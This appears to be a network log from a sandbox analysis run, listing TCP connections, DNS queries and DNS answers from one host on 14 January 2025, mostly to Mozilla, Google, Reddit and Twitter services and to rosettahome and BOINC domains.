                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.683634996 CET4434980234.120.208.123192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.437685966 CET44349817208.68.240.115192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.437783003 CET49817443192.168.2.16208.68.240.115
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.437838078 CET44349817208.68.240.115192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.437985897 CET49817443192.168.2.16208.68.240.115
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.473403931 CET8049816104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.519661903 CET4981680192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.596751928 CET49704443192.168.2.162.23.242.162
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.602375984 CET443497042.23.242.162192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:41.602468014 CET49704443192.168.2.162.23.242.162
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.236449957 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.241400957 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.241477013 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.241584063 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.246324062 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.827482939 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.874691963 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.511097908 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.511149883 CET4434982134.107.243.93192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.511241913 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.512773991 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.512792110 CET4434982134.107.243.93192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.983222961 CET4434982134.107.243.93192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.983321905 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.989799023 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.989816904 CET4434982134.107.243.93192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.989926100 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.989965916 CET4434982134.107.243.93192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.990082026 CET49821443192.168.2.1634.107.243.93
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.993488073 CET4973880192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.998310089 CET804973834.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.092423916 CET804973834.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.095351934 CET4974280192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.100239992 CET804974234.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.144829035 CET4973880192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.194338083 CET804974234.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.237698078 CET4974280192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.475009918 CET8049816104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.475811005 CET4981680192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.538058996 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.538086891 CET4981680192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.543097019 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.543119907 CET8049816104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.701327085 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.701350927 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:48.701410055 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:53.706437111 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:53.708631992 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.066068888 CET4982080192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.066359043 CET4982280192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.066574097 CET49823443192.168.2.16208.68.240.115
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.066636086 CET44349823208.68.240.115192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.066732883 CET49823443192.168.2.16208.68.240.115
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.067267895 CET49823443192.168.2.16208.68.240.115
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.067281008 CET44349823208.68.240.115192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.071146011 CET8049820104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.071166039 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.071238995 CET4982280192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.071654081 CET4982280192.168.2.16104.238.61.8
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076520920 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076541901 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076553106 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076587915 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076596975 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.076668024 CET8049822104.238.61.8192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.096714973 CET4973880192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.101547956 CET804973834.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.207792997 CET4974280192.168.2.1634.107.221.82
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.212656975 CET804974234.107.221.82192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.758629084 CET44349823208.68.240.115192.168.2.16
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898116112 CET53617301.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898685932 CET5599253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET53617971.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.899245024 CET5226053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.904586077 CET53655221.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.905776978 CET53559921.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906407118 CET5025353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906821012 CET5780853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET53522601.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.913726091 CET53578081.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.914691925 CET53502531.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.917057037 CET5222353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.917505026 CET5541553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.923856974 CET53522231.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.924540043 CET53554151.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.960206032 CET6510453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET53651041.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.970392942 CET5916453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.978099108 CET53591641.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.978754044 CET5590553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.985769987 CET53559051.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.462337971 CET5223553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET53522351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.470671892 CET5970953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.477456093 CET53597091.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.478105068 CET5624053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.485651970 CET53562401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.465959072 CET5830253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.489919901 CET53578981.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.492458105 CET6454353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.500164032 CET53645431.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.501178980 CET6115753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.507937908 CET53611571.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.509174109 CET5445653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.516114950 CET53544561.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.606731892 CET5965253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613336086 CET53596521.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613954067 CET5657953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.621319056 CET53565791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.293251991 CET53546041.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.925563097 CET6516453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.932233095 CET53651641.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.943237066 CET5277753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.950455904 CET53527771.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.276978016 CET5918253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.277035952 CET6423353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284008026 CET53591821.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284116030 CET53642331.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284805059 CET6456753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.291619062 CET53645671.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.218256950 CET5764353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.225110054 CET53576431.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.443720102 CET5517853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.450993061 CET53551781.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.242422104 CET6413553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.249341011 CET53641351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.531899929 CET5811953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.538676977 CET53581191.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.540677071 CET6441653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.547571898 CET53644161.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.853272915 CET4944853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.859751940 CET53494481.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.843679905 CET5566653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET53556661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.856278896 CET5230053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET53523001.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.865125895 CET5152653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET53515261.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.490956068 CET5729353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.498796940 CET53572931.1.1.1192.168.2.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284805059 CET192.168.2.161.1.1.10xc086Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.218256950 CET192.168.2.161.1.1.10x5371Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.443720102 CET192.168.2.161.1.1.10x9f0aStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.242422104 CET192.168.2.161.1.1.10xf49eStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.531899929 CET192.168.2.161.1.1.10xed7Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.540677071 CET192.168.2.161.1.1.10x4706Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.853272915 CET192.168.2.161.1.1.10x264Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.843679905 CET192.168.2.161.1.1.10x8bb1Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.856278896 CET192.168.2.161.1.1.10x7231Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.865125895 CET192.168.2.161.1.1.10xb549Standard query (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.490956068 CET192.168.2.161.1.1.10x1df8Standard query (0)normandy.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.500124931 CET192.168.2.161.1.1.10x48a8Standard query (0)normandy-cdn.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.508037090 CET192.168.2.161.1.1.10xe8f2Standard query (0)normandy-cdn.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:04.645312071 CET192.168.2.161.1.1.10x24d9Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.500736952 CET192.168.2.161.1.1.10xf7b4Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.107455015 CET192.168.2.161.1.1.10x744fStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET192.168.2.161.1.1.10x77c7Standard query (0)rosettahome.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.457077026 CET192.168.2.161.1.1.10x307fStandard query (0)boinc.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.025022030 CET192.168.2.161.1.1.10xff60Standard query (0)rosettahome.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.502249002 CET192.168.2.161.1.1.10xca28Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.510947943 CET192.168.2.161.1.1.10xb8b9Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.992990971 CET192.168.2.161.1.1.10x1919Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:30.426593065 CET192.168.2.161.1.1.10x61fbStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.875329018 CET1.1.1.1192.168.2.160x4f2eNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.879350901 CET1.1.1.1192.168.2.160xe1caNo error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882644892 CET1.1.1.1192.168.2.160xd4acNo error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.883964062 CET1.1.1.1192.168.2.160xcb86No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.883964062 CET1.1.1.1192.168.2.160xcb86No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.886966944 CET1.1.1.1192.168.2.160x5a2cNo error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)www.reddit.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889830112 CET1.1.1.1192.168.2.160xd56aNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898116112 CET1.1.1.1192.168.2.160x81eNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.902679920 CET1.1.1.1192.168.2.160x76baNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.902679920 CET1.1.1.1192.168.2.160x76baNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
